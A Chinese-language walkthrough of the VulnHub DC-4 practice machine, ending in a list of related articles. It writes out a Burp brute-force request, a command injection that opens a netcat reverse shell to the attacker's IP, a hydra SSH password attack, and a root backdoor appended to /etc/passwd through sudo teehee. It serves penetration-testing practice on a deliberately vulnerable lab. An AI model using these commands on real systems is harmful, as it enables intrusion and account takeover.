VulnHub通关日记-DC_4-Walkthrough

简介: DC-4是另一个专门构建的易受攻击的实验室,目的是在渗透测试领域积累经验。

靶机介绍

DC-4是另一个专门构建的易受攻击的实验室,目的是在渗透测试领域积累经验。

与以前的DC版本不同,此版本主要为初学者/中级用户设计。只有一个标志,但是从技术上讲,有多个入口点,就像上次一样,没有任何线索

靶机地址:https://www.vulnhub.com/entry/dc-4,313/

这边靶机和前一个是一样的,只需要获取一个Flag就行了,在/root目录下!

学习到的知识

Burpsuite枚举弱密码命令执行反弹shellhydra爆破sshteehee权限提升

信息搜集

拿到IP先对它进行端口扫描:


nmap -A -T4 192.168.1.100


图片


这边扫描出来靶机开放了22(ssh),80(http)端口,先从80端口来入侵:


http://192.168.1.100/


图片


Burpsuite枚举弱密码

:后发现是一个登陆的页面,我尝试了常规的弱口令adminadmin123无果,随后我又尝试了一遍SQL注入,并没有注入点!这个时候就需要掏出我的字典来了来配合Burp爆破:




POST /login.php HTTP/1.1Host: 192.168.1.100User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://192.168.1.100/Content-Type: application/x-www-form-urlencodedContent-Length: 30Connection: closeCookie: PHPSESSID=lddqa4ven9a9qqf8ua9tlurj35Upgrade-Insecure-Requests: 1
username=admin&password=§123456§


burp枚举弱密码1



burp枚举弱密码2


爆破成功后得到密码happy,随后携带账号和密码登陆到了后台,在后台发现可以执行查看文件的操作:


执行查看文件操作


命令执行反弹shell

这个时候想到了命令执行whoami看了看权限是一个网站普通权限:


whoami回显


我们先用nc反弹一个shell回来把,kali监听4444端口,在radio变量输入nc反弹的地址成功反弹一枚shell:


nc -e /bin/sh 192.168.1.128 4444


反弹壳


我们先让它得到一个bash把:


python -c 'import pty;pty.spawn("/bin/bash")'

hydra爆破ssh

之后我是在/home/jim目录里发现了一个历史密码备份文件


历史密码备份文件


既然得到了密码,就那么用九头蛇来爆破把:


hydra -l jim -P pass ssh://192.168.1.100 -t 10


九头蛇爆破


爆破成功后得到jim的密码为jibril04,后来我登陆到了jim用户:


ssh jim@192.168.1.100


ssh链接


登陆之后我习惯性的sudo -l发现需要密码:


须藤-l回显


紧接着我在jim的目录下发现了一个文件,文件里好像是一封邮件信息:




From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
        (envelope-from <root@dc-4>)
        id 1hCiQe-0000gc-EC
        for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO
This is a test.


邮件信息


好像没得啥子用处!最后我在邮箱目录找到了另一封邮件:


另一篇邮件信息


读完这封邮件我得到了charles告诉jim的一个重要信息,也就是charles的密码!


charles:^xHhA&hvim0y

获取到密码后我切换到了charles用户:



su charles^xHhA&hvim0y


切换charles用户


teehee权限提升

切换用户之后我又是习惯性的sudo -l发现charles用户可以以root身份去运行teehee命令:


用root身份身份运性teehee命令


我紧接着写入了一个账号saulpasswd里:



echo "saul::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
#注释:
#[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]


写入passwd拿到标志


最后也是在/root目录下拿到了Flag

相关文章
|
SQL 安全 网络协议
VulnHub通关日记-DC_9-Walkthrough
DC-9是 DC 系列的最后一个靶机了,这项挑战的最终目标是扎根并读取唯一的标志。
|
SQL 安全 Shell
VulnHub通关日记-DC_7-Walkthrough
DC-7是另一个专门构建的易受攻击的实验室,目的是在渗透测试领域积累经验。
|
Shell 网络安全 数据安全/隐私保护
VulnHub通关日记-DC_6-Walkthrough
好的,这并不是一个真正的线索,但是对于那些只是想继续工作的人,更多的是“我们不想花五年时间等待某个过程完成”的建议。
|
安全 Shell C语言
VulnHub通关日记-DC_5-Walkthrough
LFI(本地文件包含)日志获取shell wfuzz工具的使用 screen提权root
|
Shell Linux 网络安全
VulnHub通关日记-DC_2-Walkthrough
总共有5个Flag,最后一个Flag是在 root 目录下!
|
SQL 安全 关系型数据库
VulnHub通关日记-DC_1-Walkthrough
DC系列的靶机是一个专门构建的易受攻击的实验室,总共有九个!目的是获得渗透测试领域的经验
|
5月前
BOSHIDA DC/AC电源模块的节能特点与环保优势
BOSHIDA DC/AC电源模块的节能特点与环保优势
BOSHIDA DC/AC电源模块的节能特点与环保优势
|
5月前
|
安全
DC/AC电源模块为现代电子设备提供稳定的能源
DC/AC电源模块为现代电子设备提供稳定的能源
 DC/AC电源模块为现代电子设备提供稳定的能源
|
5月前
|
安全
DC/AC电源模块:让电力转换变得更简单
DC/AC电源模块:让电力转换变得更简单
DC/AC电源模块:让电力转换变得更简单
|
3月前
|
芯片 网络架构
开关电源DC-DC电源应用
DC-DC指直流转直流电源(Direct Current)。是一种在直流电路中将一个电压值的电能变为另一个电压值的电能的装置。如,通过一个转换器能将一个直流电压(5.0V)转换成其他的直流电压(1.5V或12.0V),我们称这个转换器为DC-DC转换器,或称之为开关电源或开关调整器。 DC-DC转换器一般由控制芯片,电感线圈,二极管,三极管,电容器构成。在讨论DC-DC转换器的性能时,如果单针对控制芯片,是不能判断其优劣的。其外围电路的元器件特性,和基板的布线方式等,能改变电源电路的性能,因此,应进行综合判断。 DC-DC转换器的使用有利于简化电源电路设计,缩短研制周期,实现最佳指标等,被